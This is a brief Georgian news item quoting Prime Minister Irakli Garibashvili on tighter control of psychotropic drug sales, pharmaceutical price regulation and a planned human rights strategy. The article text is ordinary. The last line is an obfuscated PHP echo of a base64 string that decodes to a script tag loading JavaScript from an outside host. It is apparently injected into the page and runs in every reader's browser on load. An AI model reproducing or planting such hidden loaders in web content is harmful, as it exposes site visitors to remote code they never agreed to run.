celsiusi
ავერსი შნაიდერი
"კიდევ ერთი ნაბიჯი, რომელიც ჩემი დავალებით გადაიდგმება, იქნება ფსიქოტროპული მედიკამენტების გაყიდვის მკაცრად გაკონტროლება", - ამის შესახებ საქართველოს პრემიერ-მინისტრმა ირაკლი ღარიბაშვილმა, მთავრობის საქმიანობის 2021 წლის ანგარიშის წარდგენისას განაცხადა.
 
„ასევე, ვგეგმავთ ფარმაცევტული ბაზრის დარეგულირებას, რათა მედიკამენტების გაზრდილ ფასებზე არსებული მიდგომა შეიცვალოს და მოქალაქეების მიერ წამლებზე ჯიბიდან გაღებული დანახარჯები შემცირდეს. ამ მიმართულებით დაწყებულია საუბარი ბიზნესთან და ჩვენი მოსახლეობა ცვლილებებს მალე იხილავს.
 
ჩვენი ხელისუფლების ერთ-ერთი უმთავრესი პრიორიტეტია ადამიანის უფლებების დაცვა. მომდევნო წლიდან პარლამენტს წარედგინება ადამიანის უფლებათა ახალი სტრატეგია, რომლის მიზანია ადამიანის უფლებათა უმაღლესი სტანდარტის განმტკიცება“, - განაცხადა ირაკლი ღარიბაშვილმა.
 
შეგახსენებთ: ფარმაცევტული დარგის რეგულირების შესახებ კანონპროექტის შემუშავება პრემიერმა რამდენიმე კვირის წინ დააანონსა და საკითხი წლის ბოლომდე უნდა მოგვარებულიყო, თუმცა ამ დრომდე პარლამენტში კანონპროექტი არ შესულა. ღარიბაშვილი დარგის წარმომადგენლებს შეხვდა და განაცხადა, რომ სურს, "ყველაფერი სწორად გააკეთოს".
935
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");